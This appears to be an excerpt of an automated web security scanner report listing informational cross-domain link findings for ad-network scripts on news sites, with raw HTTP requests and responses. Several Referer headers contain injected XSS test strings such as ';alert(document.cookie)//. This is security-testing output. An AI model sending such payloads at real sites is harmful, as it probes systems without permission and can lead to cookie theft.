...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.165. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=242
Expires: Fri, 28 Jan 2011 14:52:34 GMT
Date: Fri, 28 Jan 2011 14:48:32 GMT
Connection: close
Content-Length: 1875

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/"><\/script>
...[SNIP]...

17.166. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Fri, 28 Jan 2011 14:15:59 GMT
Date: Fri, 28 Jan 2011 14:14:35 GMT
Connection: close
Content-Length: 1870

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCust
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/"><\/script>
...[SNIP]...

17.167. http://common.onset.freedom.com/fi/adsense/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/adsense/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /fi/adsense/?scode=wrgb&placement=section HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_footer/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n13), ht iad-agg-n13.panthercdn.com
Cache-Control: max-age=7200
Expires: Fri, 28 Jan 2011 17:59:54 GMT
Age: 5855
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 4922

function google_ad_request_done(google_ads) {

   if (google_ads.length == 0) return;
   var s = ''; var i;
   var reflink="https://adwords.google.com/select/OnsiteSignupLandingPage?client=ca-freedom_js&ref
...[SNIP]...
</div><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + ' codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"' + ' WIDTH="' + google_ad.image_width + '" HEIGHT="' + google_ad.image_height + '">' + '<PARAM NAME="movie" VALUE="' + google_ad.image_url + '">
...[SNIP]...

17.168. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.925386450253427 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,2,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:6:7:0:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2501

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<SCRIPT SRC="http://ib.adnxs.com/ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=' + Math.random() + '" TYPE="text/javascript">');
document.write('<\/script>
...[SNIP]...

17.169. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.24530343222431839 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=1:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:951,2,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:1:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Fri, 28 Jan 2011 22:00:22 GMT
Date: Fri, 28 Jan 2011 21:57:32 GMT
Connection: close
Content-Length: 2108

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848" type="text/javascript"><\/script>
...[SNIP]...

17.170. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.9864981058053672 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://boston30.autochooser.com/results.asp?6bfd0%3balert(document.cookie)//cb19586ae74=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1; FFcat=826,187,7:951,2,7; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1; PI=h1037004Za883600Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:826,196645|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1;expires=Mon, 28 Feb 2011 14:24:53 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:24:53 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=56
Expires: Sat, 29 Jan 2011 14:25:50 GMT
Date: Sat, 29 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 4383

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856419/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883603%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.171. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=10/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.44924098439514637 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1; FFcat=826,187,7:951,7,7:951,2,7; FFad=1:0:0; 